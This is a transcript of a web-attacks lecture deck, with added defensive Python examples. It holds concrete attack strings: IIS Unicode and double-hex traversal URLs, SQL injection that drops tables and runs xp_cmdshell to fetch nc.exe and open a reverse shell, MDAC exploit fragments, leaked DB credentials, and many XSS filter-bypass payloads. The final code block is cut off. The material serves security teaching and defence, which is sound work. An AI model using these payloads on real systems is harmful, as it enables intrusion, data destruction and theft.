Network Security Part II: Attacks
Web Attacks
TRANSCRIPT

Overview
• Web Architecture
• Web Hack Attacks

Web Architecture
• Web applications are important and this importance is accelerating
• Web applications are complex and this complexity is accelerating

This is Not New
• Problems with web applications are the same as the problems with standalone applications

Why Target the Web
• Everyone is using it
• Safe bet the protocol will not become obsolete anytime soon
• New technology is being implemented/retrofitted on top (e.g. SOAP, WebDAV)
• It’s everywhere! Mobile phones, cars, watches, toasters…
• Protocol fundamentally not suited to do a majority of what it’s doing today

The Trouble with HTTP
• Multitude of involved technologies
• The involved protocols are extremely simple; therefore, it is easy to (mis)code services on your own HTTP server
• Lack of experience coding public service type, multi-user applications
• Stateless nature makes transaction based systems tricky

How Did We Get Here?
• Unskilled/robotic programmers (“code mills”)
• Lack of security-oriented programming training
• Tendency to ‘code now, fix later’
• Current tools make it very easy to code insecurely
• Misconceptions about what ‘security’ really involves

Trouble Prone Areas of the Web
• Buffer overflows
– Classic bug that’s been exploited for quite a while
– Lack of bounds-checking in the language a majority of web applications are written in, combined with poor programming practice
– Can exist in the web server, application server, database server, or the CGI programs
– Fortunately it’s a well-advertised problem
– Many scripting languages (ASP, PHP, Perl, .NET, etc) are generally immune, as they have auto-expanding elements

Trouble Prone Areas of the Web
• Cross-site scripting
– Reprinting user data without filtering it for web-specific characters
– Potential to trick users into executing JavaScript in the vulnerable site’s context
– Partly a ‘social engineering’ technique
– More of a liability than a vulnerability: it’s a way to hack the users, not the server

Trouble Prone Areas of the Web
• SQL tampering
– Web server already has/allows access to the database server
– Attacker can cause arbitrary SQL to be executed
– Results vary from data exposure to full system compromise
– Does not require direct database access!
– Many applications are vulnerable
– Stems from CGIs/scripts making assumptions about user input and not double checking/filtering

Trouble Prone Areas of the Web
• File includes
– It’s common for a CGI to open and display or manipulate the contents of a file on the server
– If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
– Can lead to info disclosure or script or command execution

Trouble Prone Areas of the Web
• Authentication weaknesses
– CGIs can fail to check credentials with every request
– Thus you bypass the login script and directly access the following scripts, without needing username/password
– Or, certain actions/functions may not check for the proper authentication

Trouble Prone Areas of the Web
• Weak session mechanism
– The session/state mechanism uses predictable token IDs
– Or, the ID keyspace is too small for the number of users
– Either way, an attacker can ‘guess’ a valid token and hijack the session

Mid Range E-Commerce Roll-Out
• Web Server
• Application Server
• Database Server
• … and a Firewall
• Maybe some options…
– Load Balancer
– Reverse Proxy servers
– Cache systems

Typical Web Application Set-Up
(Diagram: a web client sends an HTTP request (cleartext or SSL) through a firewall to the web server (Apache, IIS, Netscape, etc.), which runs the web apps via plugins (Perl, C/C++, JSP, etc.) and reaches the SQL database over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, JavaScript, VBScript, etc.)

Traditional Hacking
• Targeted against vulnerabilities in OS components and network services
– Buffer overflows
• Not portable; attacks specific to operating system architecture, authentication, services, etc.
• Myriad of exploits for different services, OS platforms, CPU architectures, etc.

Traditional Hacking
• Requires specialized coding skills such as writing shell-code for buffer-overflows, etc.
• In short, it is a complex activity with a limited practitioner base.

```asm
...
winsock_found:
    xor eax, eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    call socket
    cmp eax, -1
    jnz socket_ok
    push sockerrl
    push offset sockerr
    call write_console
    jmp quit2
socket_ok:
    mov sock, eax
    mov sin.sin_family, 2
    mov esi, offset _port
...
```

Limitations of Traditional Hacking…
• Modern network architectures are getting more robust and secure.
• Firewalls being used in almost all network roll-outs.
• OS vendors learning from past mistakes (?) and coming out with patches rapidly.
• Increased maturity in coding practices.

Utility of Firewalls
(Diagram: hacks on OS network services such as wu-ftpd, Sun RPC and NT ipc$ are prevented by firewalls; this limits traditional hacking.)

Utility of Firewalls
(Diagram: internal back-end application servers are on a non-routable IP network, i.e. private addresses.)

Utility of Firewalls
(Diagram: outbound access is restricted. Why would a web server telnet out?)

Futility of Firewalls
• Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
• HTTP is perceived as friendly traffic.
• Why lay siege to the wall when you have an open door?
• Attacks based on content/applications are still viewed by some as rare.

Tools Required for Web Hacking
• A web browser
• An Internet connection
• … a clear mind and some spare time!

A Classification of Web Hacks
• Web attacks fall under the following general categories:
– Buffer overflow attacks
– SQL injection attacks
– Input validation attacks
– URL interpretation attacks
– Impersonation attacks

Firewalls Cannot Prevent… Web server misconfiguration
(Diagram: web client, firewall, web server.)
• Complexity mismanagement
• Indifference

Attack the Architecture
(Diagram of web server handlers: the html handler returns the file with a text/html header; the shtml handler processes SSI tags (#exec, #include), which can run /bin/sh or include a file; the jsp handler processes JSP tags, passes the result to the Java compiler, and the resulting class runs in the Java runtime; the cgi handler runs the script/executable via sh, perl, etc.; the default handler’s behaviour is marked “??”.)

Web Server Architecture Attacks
• Complex web server architectures can lead to implementation vulnerabilities.
• A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
• A close look at the web server architecture can reveal security problems.

Architecture Misconfigurations
• Handler Forcing:
– Certain mis-configurations allow handlers to be forced onto files that are not supposed to be processed by them.
– Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
– Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.

JSP Handler Forcing
(Diagram: the JSP page-compile handler is forced onto html files, so instead of the html handler returning text/html, the file goes through process JSP tags → Java compiler → class → Java runtime.)

Firewalls Cannot Prevent… Poor checking of user inputs
(Diagram: web client, firewall, web server and web apps; URL interpretation attacks pass straight through.)
• Input validation attacks

URL Interpretation Attacks
• Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000 have been wrapped into a common definition: "The Unicode Bug."
• URL parsing vulnerability.
• Improper handling of illegal Unicode sequences.
• Allows remote users to execute arbitrary commands on the web server under the context of IUSR.
• Can lead to potential Administrator level access.

The IIS Unicode Bug
• Exploit: http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
– attacker could view a directory listing of a server's C:\ drive
• %c0%af = “/”
• Can use HTTP POST to send multiple commands at a time to cmd.exe.

Web Hacking for Collateral Damage
• Web hacking can result in three types of collateral damage:
1. Information disclosure (paths etc.)
• Arbitrary file content and source code leakage
2. Data disclosure (i.e. return all rows)
3. Arbitrary command execution

Source Code Disclosure
“Use the Source, Luke!”
• WebLogic / WebSphere “JSP” bug [1]
• Ability to retrieve source code of JSP/JHTML files.
• Using uppercase “JSP” in the URL causes the server to return unparsed JSP code.
[1] Discovered by Shreeraj Shah, Foundstone.

A Classic Case of “Handler Mismatch”
(Diagram: an HTTP request for index.JSP reaches the WebLogic server; on the file system index.JSP = index.jsp, but the request is not matched by the *.jsp registration, so the jsp handler (process JSP tags → Java compiler → Java runtime) is skipped and the default handler serves the file instead.)

```
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
```

More Source Disclosure
• URL prefixes for source code disclosure [1]:
– /servlet/file/ (IBM WebSphere)
– /file/ (BEA WebLogic)
– /*.shtml/ (BEA WebLogic)
– /ConsoleHelp/ (BEA WebLogic)
– /servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
[1] Advisories located on: http://www.foundstone.com/advisories.htm

… I Thought it was Functionality
• IIS “+.htr” bug.
– View source code of ASP/ASA files.
– URL interpretation vulnerability.
http://10.0.0.1/global.asa+.htr
– “.htr” causes ISM.DLL to handle the URL.
– Characters after the “+” sign (space) are ignored.

Doom on You…

```vbscript
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
    Set Db = Server.CreateObject("Commerce.DbServer")
    Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
    Db.Application = "http://10.1.1.16/"
    Set Application("Db") = Db
End Sub
Sub Session_OnStart
    '==Visual InterDev Generated - DataConnection startspan==
    '--Project Data Connection
    Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
    Session("DataConn_ConnectionTimeout") = 15
    Session("DataConn_CommandTimeout") = 30
    Session("DataConn_RuntimeUserName") = ""
    Session("DataConn_RuntimePassword") = ""
    '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>
```

User ID: sa
Password: n0t4u2c

More Source Disclosure
• Some applications access files without appropriate checking.
• Input validation vulnerability.
• No checking performed for file type or location.
• Filenames can be manipulated via parameters passed on the URL or as hidden fields.

NT IIS Showcode ASP Vulnerability
• Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
• Gives remote users access to view any file on the same volume as the web server that is readable by the web server.
http://www.someserver.com/msadc/Samples/SELECTOR/Showcode.asp?source=/msadc/Samples/../../../../../boot.ini

Firewalls Cannot Prevent…
(Diagram: input validation attacks and URL interpretation attacks travel in the HTTP request (cleartext or SSL) through the firewall to the web server and web apps, and extend the SQL statements sent to the SQL database.)
• SQL Query Poisoning

SQL Query Poisoning
• Poor input validation on parameters passed to SQL queries can be disastrous.
• Return all rows: http://10.0.0.3/showtable.asp?ID=3+OR+1=1
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 OR 1=1

SQL Query Poisoning
• Drop Table: http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
• Resultant query: SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

SQL Query Poisoning
• Remote Command Execution!
http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+‘tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000’
• Command executed: tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000

SQL Remote Commando
(Diagram: (1) the web browser sends the poisoned query SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000 to the ASP page on IIS, which passes it to the DB; (2) a tftp server is used to get nc.exe transferred over to the NT IIS box; (3) a listener at port 2001 receives the connection and gets a C:\> prompt.)

Firewalls Cannot Prevent…
(Diagram: reverse engineering HTTP cookies and HTTP session hijacking, alongside input validation attacks, SQL query poisoning and URL interpretation attacks, all pass through the firewall to the web server, web apps and SQL database.)
• Impersonation

Firewalls Cannot Prevent…
(Diagram: the typical web application set-up again: HTTP request (cleartext or SSL) and HTTP reply (HTML, JavaScript, VBScript, etc.) through the firewall to the web server (Apache, IIS, Netscape, etc.) with plugins (Perl, C/C++, JSP, etc.) and a database connection (ADO, ODBC, etc.) to the SQL database.)
• Application bugs

The MDAC Attack
• Vulnerability with Microsoft Data Access Components (msadcs.dll).
• MDAC allows remote users to perform SQL queries without authentication.
• Only the DSN needs to be known.
• SQL queries can be crafted to execute arbitrary commands.

The MDAC Attack
(Diagram, client and server: on the client, Internet Explorer or VB.exe uses the RDS Data Control, the RDS Data Space and custom business objects; on the server, IIS (msadcs.dll) exposes the Remote Data Service over URL/HTML, behind which sit the RDS Data Factory, ASP (ADO), OLE DB, the ODBC provider and the Jet 3.5 provider.)

The MDAC Attack
• Exploit:

```perl
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";
```

• Gain Administrator Privileges on NT!

The MDAC Attack in Action
(Diagram: (1) mdac.pl (exploit) sends SELECT * FROM Customers WHERE City = “|shell($command)” to msadcs.dll on IIS 4.0, which passes it to the DB; (2) a tftp server is used to get nc.exe transferred over to the NT IIS box; (3) a listener at port 2001 receives the connection and gets a C:\> prompt.)

The Effectiveness of Web Hacking
• By default, ports 80 and 443 are usually allowed through firewalls. The open door…
• A single URL string is able to be processed by many different components.
• In most cases the only defense is reliance on secure coding.

Missile of Death
(Diagram: a single URL, http://10.0.0.1/catalog/display.asp?pg=1&product=7, passes through the web server to the web apps and on to the databases.)

Cross Site Scripting, Why You Should Care
• XSS is not an attack on the server, it is an attack on the users of your application
• So what?
– Identity theft
– User masquerading
– Reputation risk

Cross Site Scripting (XSS)
• Found in 98% of applications
• 2 main types
– Transient (URL based): http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
– Sticky: script placed in a static bit of web content

XSS continued…
• Transient generally requires user interaction
• What can happen?
– Possibilities are only restricted by the client
– Cookie theft most common example
• But I filter “<” and “>”
– Jscript entities: “&{alert('Test')};”
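An added example (not from the original slides) of the error.jsp reflection in the two XSS slides above, written in Python: the page's msg parameter rendered verbatim, rendered with only “<” and “>” replaced, and rendered with full HTML entity encoding. The two payloads are copied from the slide bullets; the render functions and the surrounding `<p>` markup are constructed for this example.

```python
import html

# Constructed payloads copied from the slide bullets.
SCRIPT_TAG = '<SCRIPT>alert("Test");</SCRIPT>'
JSCRIPT_ENTITY = "&{alert('Test')};"


def render_error_unescaped(msg: str) -> str:
    # The reflected (transient) XSS pattern: user data reprinted verbatim.
    return f"<p>Error: {msg}</p>"


def render_error_angle_brackets_only(msg: str) -> str:
    # The "But I filter < and >" defence: tags are neutralised, but the
    # JScript entity contains neither character and passes through intact.
    filtered = msg.replace("<", "&lt;").replace(">", "&gt;")
    return f"<p>Error: {filtered}</p>"


def render_error_escaped(msg: str) -> str:
    # Entity-encoding &, <, >, " and ' turns user data into inert text in an
    # HTML text context; the leading & of "&{...}" is what the simple filter missed.
    return f"<p>Error: {html.escape(msg, quote=True)}</p>"


def payload_survives(payload: str, rendered: str) -> bool:
    # Review check: is the payload still present byte-for-byte in the output?
    return payload in rendered


if __name__ == "__main__":
    for name, render in (
        ("unescaped", render_error_unescaped),
        ("angle brackets only", render_error_angle_brackets_only),
        ("fully escaped", render_error_escaped),
    ):
        print(f"{name:20s} script tag survives: {payload_survives(SCRIPT_TAG, render(SCRIPT_TAG))!s:5s} "
              f"jscript entity survives: {payload_survives(JSCRIPT_ENTITY, render(JSCRIPT_ENTITY))}")
```

Output encoding is context specific: `html.escape` is right for HTML text and quoted attribute values, and a different encoder is needed when user data lands inside a script block or a URL. For the cookie-theft case the slide names, marking the session cookie HttpOnly keeps it out of reach of script even when encoding is missed somewhere.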

Session Hijacking
• HTTP is stateless so application designers must build a way to track state
• Cookies and URL strings are the most common ways to track state
• Both are easily exploitable

Session Hijacking Continued…
• Generally the next thing to occur after XSS
• Examples of common session tracking issues

Parameter Tampering
• Programmers will store data anywhere!
– URL parameters: http://badapp.com/checkout.pl?p=$1.00
– Cookies: Cookie: p=$1.00
– Hidden fields: not really hidden

Unbound File Calls
• Ye Ole’ ../../
• Becomes an issue when the display includes important information (global.asa)
• Most application languages will take URLs as file arguments

Do You Know Where Your Data is?
• Building an exclusionary filter is difficult because your data is all over the place

Data Flow Example
(Diagram: data from the Internet enters www.hackme.com and flows on to the customer service database, the marketing database and the orders database.)

Designing a proper filter
• Make all filters default deny
– Don’t try to exclude “bad stuff”
• Requires a good idea where your data is going
• Log all filter violations
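An added example (not from the original slides) of the default-deny filter the slide above describes, applied to the display.asp URL from the “Missile of Death” slide and to the checkout.pl price parameter from the Parameter Tampering slide. The allowlist rules, the logger name and the function names are assumptions made for this example; every parameter must match its rule, anything not listed is refused, and every refusal is logged.

```python
import logging
import re
from urllib.parse import parse_qsl, urlsplit

log = logging.getLogger("input-filter")

# Allowlist (assumed for this example): parameter name -> pattern that the
# whole decoded value must match. Anything not listed here is denied by default.
RULES = {
    "pg": re.compile(r"[1-9][0-9]{0,2}"),
    "product": re.compile(r"[1-9][0-9]{0,7}"),
}


def filter_query(url: str, rules: dict = RULES) -> dict:
    """Return the accepted parameters of `url`, or raise ValueError on the
    first violation. Every rejection is logged, as the slide asks."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    accepted: dict = {}
    for name, value in params:
        rule = rules.get(name)
        if rule is None:
            # A client-supplied price (checkout.pl?p=$1.00) lands here: the
            # server never accepts a price from the client in the first place.
            log.warning("unknown parameter %r rejected in %s", name, url)
            raise ValueError(f"unknown parameter: {name}")
        if name in accepted:
            log.warning("duplicate parameter %r rejected in %s", name, url)
            raise ValueError(f"duplicate parameter: {name}")
        if not rule.fullmatch(value):
            # parse_qsl has already decoded %xx and '+', so the rule sees the
            # value the application would see, e.g. "7 OR 1=1" or "<SCRIPT>".
            log.warning("value %r for %r rejected in %s", value, name, url)
            raise ValueError(f"bad value for {name}")
        accepted[name] = value
    return accepted


def is_accepted(url: str) -> bool:
    # Convenience wrapper so callers can branch without catching.
    try:
        filter_query(url)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(filter_query("http://10.0.0.1/catalog/display.asp?pg=1&product=7"))
    print(is_accepted("http://badapp.com/checkout.pl?p=$1.00"))
```

Because the rules describe what is allowed rather than what is forbidden, the encoding and case tricks listed on the filter-bypass slides have nothing to bypass: the check runs on the decoded value, and a value that is not a plain positive integer fails whatever it was encoded as. The logged rejections are the detection feed the slide calls for.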

Filter Bypassing is a Technique to Evade Detection by Filtering Systems
• Filter Bypassing techniques come in many varieties when applied to the many facets of web application security.
• The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
• Many of the described techniques can be highly effective when used properly and even become more powerful when used in combination.

Most filter systems are very simple
Seven forms of ingenuity:
• URL Encoded Strings
• Double Hex Encoding
• Unicode Encoded String
• Long URLs
• Case Sensitivity
• XSS Filter-Bypass Manipulation
• Null Character Injection

The Hex Advantage
By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64
![Page 67: Network Security Part II: Attacks Network Security Part II: Attacks Web Attacks](https://reader035.vdocument.in/reader035/viewer/2022062300/56649e105503460f94afb87d/html5/thumbnails/67.jpg)
Double Hex Encoding
• In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
• The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
• An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit the vulnerability.
• When an unpatched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
• IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
• This second round of decoding was the source of another vulnerability: the string that was checked was not the string that was finally used.
IIS Double Hex
Round 1 decoding:
scripts/..%255c../winnt
becomes:
scripts/..%5c../winnt
(%25 = “%” character)
Round 2 decoding:
scripts/..%5c../winnt
becomes:
scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double Hex Encoding.
The Unicode Slash
• In Unicode (UTF-8), “%c0%af” is an overlong encoding that IIS treated as the equivalent of a slash (“/”).
• Therefore the common IIS URL exploit:
scripts/..%c0%af../winnt
• becomes:
scripts/../../winnt
Once again, directory path traversal is now possible using path obfuscation through Unicode.
Double Slash
• Double Slash: using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd
• Can be used to move under the radar of IDS systems and still function properly.
Long URLs
• Many systems put limits on how much data a variable can store or a system can handle.
• Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
• URLs such as:
http://www.foo.com/cgi?param=filename
• Replaced with:
http://www.foo.com/cgi?param=<2K_of_Data>
Case Sensitivity
• Case sensitivity may play a role in many security filtration systems.
• Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR
Method Switching
• Many web applications do not properly perform HTTP request method sanity checking.
• Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
• Most web servers do not log "POST" data, and thus forensic analysis is harder to perform.
The request method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
HTTP 1.1 Methods
The Method token indicates the method to be performed on the resource identified by the Request-URI.
• OPTIONS
• GET
• HEAD
• POST
• PUT
• DELETE
• TRACE
• CONNECT
Using your “HEAD”
• The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
• Scans and web application attacks can be made more effective using this technique.
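The defensive counterpart to the Method Switching and HTTP 1.1 Methods slides is a per-resource method allowlist plus logging that records which parameters arrived, whatever the method. The following is an added example written for this page, not code from the deck; the resource paths echo the slides, the allowlist contents and the request samples are constructed.

```python
import json
import urllib.parse
from http import HTTPStatus

# Per-resource method allowlist (constructed for this example; the paths echo the
# deck's slides). Anything not listed, path or method, is refused: default deny.
ALLOWED_METHODS = {
    "/cgi-bin/some.cgi": {"GET", "HEAD"},
    "/cgi-bin/bankonline.cgi": {"POST"},
}


def check_method(path: str, method: str):
    """Return (HTTPStatus, reason); unknown paths and unlisted methods are refused."""
    allowed = ALLOWED_METHODS.get(path)
    if allowed is None:
        return HTTPStatus.NOT_FOUND, "unknown resource"
    if method not in allowed:
        return HTTPStatus.METHOD_NOT_ALLOWED, f"{method} not in {sorted(allowed)}"
    return HTTPStatus.OK, "ok"


def audit_record(method: str, path: str, query: str, body: str, content_type: str) -> dict:
    """Record the method and the parameter *names* from the query string and, for form
    posts, from the body, so switching GET to POST no longer hides which parameters
    were supplied. Values are deliberately not logged."""
    names = set(urllib.parse.parse_qs(query, keep_blank_values=True))
    if method in ("POST", "PUT") and content_type == "application/x-www-form-urlencoded":
        names |= set(urllib.parse.parse_qs(body, keep_blank_values=True))
    return {
        "method": method,
        "path": path,
        "params": sorted(names),
        "body_bytes": len(body.encode("utf-8")),
    }


def audit_log_line(method: str, path: str, query: str, body: str, content_type: str) -> str:
    """One JSON line per request for the access log."""
    return json.dumps(audit_record(method, path, query, body, content_type), sort_keys=True)


if __name__ == "__main__":
    # Constructed requests: the legitimate GET and the switched POST/TRACE variants.
    for method in ("GET", "HEAD", "POST", "TRACE"):
        print(method, "/cgi-bin/some.cgi", *check_method("/cgi-bin/some.cgi", method))
    print(audit_log_line("POST", "/cgi-bin/bankonline.cgi", "",
                         "sessionID=abcde1234&useraccount=673-12745",
                         "application/x-www-form-urlencoded"))
```

The allowlist is keyed by resource rather than being global, because the method a CGI legitimately needs differs per script; TRACE, PUT and the rest are refused simply by not being listed.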
Null Character Injection
• Hex-encoded null characters can be used to thwart some security mechanisms.
• This happens because in the “C” programming language, a null character designates the end of a string.
• So if a CGI appends “.html” to an input parameter:
http://foo.com/cgi?file=../../etc/passwd%00
• will cut off the appended “.html”.
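The Hex Advantage, Double Hex, Unicode Slash, Double Slash, Long URLs and Null Character slides all describe the same defect: the filter inspects one form of the value and the file system receives another. The fix is to canonicalize once and then apply a default-deny allowlist to the result. The following is an added example written for this page, not code from the deck; the base directory, the length limit and the sample inputs are constructed, modelled on the slides' examples.

```python
import posixpath
import re
import urllib.parse

# Constructed inputs modelled on the deck's examples (not captured traffic):
# plain, hex-encoded, double-hex, overlong UTF-8 slash, double slash,
# null byte, an over-long value, and one legitimate value.
SAMPLES = [
    "/etc/passwd",
    "/%2F%65%74%63%2F%70%61%73%73%77%64",
    "scripts/..%255c../winnt",
    "scripts/..%c0%af../winnt",
    "..//etc//passwd",
    "../../etc/passwd%00.html",
    "a" * 2000,
    "reports/2024/summary",
]

MAX_PARAM_LEN = 1024   # assumption: a sane upper bound for this parameter
# Default-deny allowlist for one path segment: this rejects '', '.', '..' and odd characters.
SEGMENT = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


class RejectedInput(ValueError):
    """Carries the reason a value failed validation (log it, do not echo it to the client)."""


def canonicalize(raw: str) -> str:
    """Decode the percent-encoding exactly once and refuse anything still ambiguous."""
    if len(raw) > MAX_PARAM_LEN:
        raise RejectedInput("over length limit")
    data = urllib.parse.unquote_to_bytes(raw)   # one round of %xx decoding, to bytes
    if b"\x00" in data:
        raise RejectedInput("null byte")
    try:
        text = data.decode("utf-8")             # strict: overlong forms such as C0 AF fail here
    except UnicodeDecodeError:
        raise RejectedInput("invalid or overlong UTF-8") from None
    if "%" in text:
        # %255c survives one decode as %5c; decoding again after the check was the IIS bug.
        raise RejectedInput("nested percent-encoding")
    return text


def validate_path(raw: str, base: str = "/var/www/files") -> str:
    """Return the resolved file path for a relative, well-formed value, else raise."""
    text = canonicalize(raw)
    if text.startswith("/") or "\\" in text:
        raise RejectedInput("absolute path or backslash")
    for segment in text.split("/"):
        if not SEGMENT.match(segment):
            raise RejectedInput(f"bad segment {segment!r}")
    resolved = posixpath.normpath(posixpath.join(base, text))
    if not resolved.startswith(base + "/"):
        raise RejectedInput("escapes base directory")
    return resolved + ".html"                   # the CGI's own suffix, appended after validation


def check_all(samples=SAMPLES) -> dict:
    """Map each sample to 'ok:<path>' or 'rejected:<reason>'."""
    results = {}
    for raw in samples:
        try:
            results[raw] = "ok:" + validate_path(raw)
        except RejectedInput as exc:
            results[raw] = "rejected:" + str(exc)
    return results


if __name__ == "__main__":
    for raw, outcome in check_all().items():
        print(f"{raw[:40]!r:45} -> {outcome}")
```

Every rejection is a candidate log line ("Log all filter violations"). The segment allowlist is what makes the filter default deny: it never has to know about ".." or "%c0%af" specifically, because only the listed characters are permitted after the single decode.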
Unicode (UTF-8) Encoded
• Unicode is a universal way to represent characters.
• However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion.
• Microsoft IIS has had security issues in the past while supporting Unicode.
URL Encoded String
• The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it restricts the characters allowed in URLs to a limited subset of the US-ASCII character set:
• "...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
XSS Filter-Bypass Manipulation
• This technique is used to pass various types of client-side scripting language through implemented security filters.
• The idea is to achieve client-side execution of a client-side script.
• There are several techniques used to perform this attack.
Hammer the Filters
• Submit all the raw HTML tags you can find, and then view the output results.
• Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).
• This will show what HTML is allowed, what the changes were, and possibly dangerous HTML that can be exploited.
SRCing the Protocol
• Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Alternate Protocol SRCing
• Same technique as the previous; however, using the protocols “livescript” and “mocha” will yield the same effect.
<IMG SRC="livescript:js_expression">
<IMG SRC="mocha:alert('test');">
Decimal HTML Entities
• Variation on previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.
<IMG SRC="java&#10;script:js_expression">
• \09 \10 \11 \12 \13 (tab, newline, vertical tab, form feed, carriage return) have all been seen to work
Hex HTML Entities
• Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.
<IMG SRC="java&#x0A;script:js_expression">
Padding HTML Entities
• Padding HTML entities with “0’s” may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC="java&#0009;script:js_expression">
STYLE JavaScript Type
• Changing the MIME type on a “style” tag may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">alert(document.domain);</style>
STYLE JavaScript X-Type
• Variation on the previous example, but by using the “application/x-javascript” MIME type, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
STYLE JavaScript Import
• The @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
STYLE URL Import
• The @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
LINK Style Sheet
• The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Style Left Expression
• A few CSS features used together to execute JavaScript.
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">
Remote SRCing
• A few HTML tags, such as “LAYER”, “ILAYER”, “FRAME”, and “IFRAME”, can be used to SRC in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
…And Curly
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert('alert')};">
• Syntax must be exact.
Dangerous HTML Tags
• “All HTML is to be considered dangerous, but these tags are the most insidious.”
– <APPLET>
– <BODY>
– <EMBED>
– <FRAME>
– <FRAMESET>
– <HTML>
– <IFRAME>
– <IMG>
– <LAYER>
– <ILAYER>
– <META>
– <OBJECT>
– <SCRIPT>
– <STYLE>
Dangerous HTML Attributes
• (HTML tags with these attributes.)
– SRC
– LOWSRC
– STYLE
– HREF
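The XSS slides from SRCing the Protocol through ...And Curly all defeat the same kind of filter: one that searches the raw attribute value for a literal string such as "javascript:". The check that survives them decodes the value the way a browser would and then accepts only an allowlisted scheme or a plain relative path. The following is an added example written for this page, not code from the deck; the allowed scheme set, the relative-path character class and the sample values are constructed (the samples reproduce the slides' variants).

```python
import html
import re

# Decide whether a user-supplied URL may be placed in an SRC/HREF/LOWSRC attribute.
# Constructed samples: the deck's bypass variants plus legitimate values.
# The boolean is the verdict the allowlist should reach (True = accept).
SAMPLES = {
    "https://example.org/logo.png": True,
    "/images/logo.png": True,
    "javascript:alert('test')": False,
    "JaVaScRiPt:alert(1)": False,
    "java&#10;script:alert(1)": False,      # decimal entity for newline
    "java&#x0A;script:alert(1)": False,     # hex entity for newline
    "java&#0009;script:alert(1)": False,    # zero-padded entity for tab
    "livescript:alert(1)": False,
    "mocha:alert(1)": False,
    "&{alert('alert')};": False,            # the "curly" form
    " javascript:alert(1)": False,
    "data:text/html,x": False,
}

ALLOWED_SCHEMES = {"http", "https", "mailto"}   # assumption: what this site actually needs
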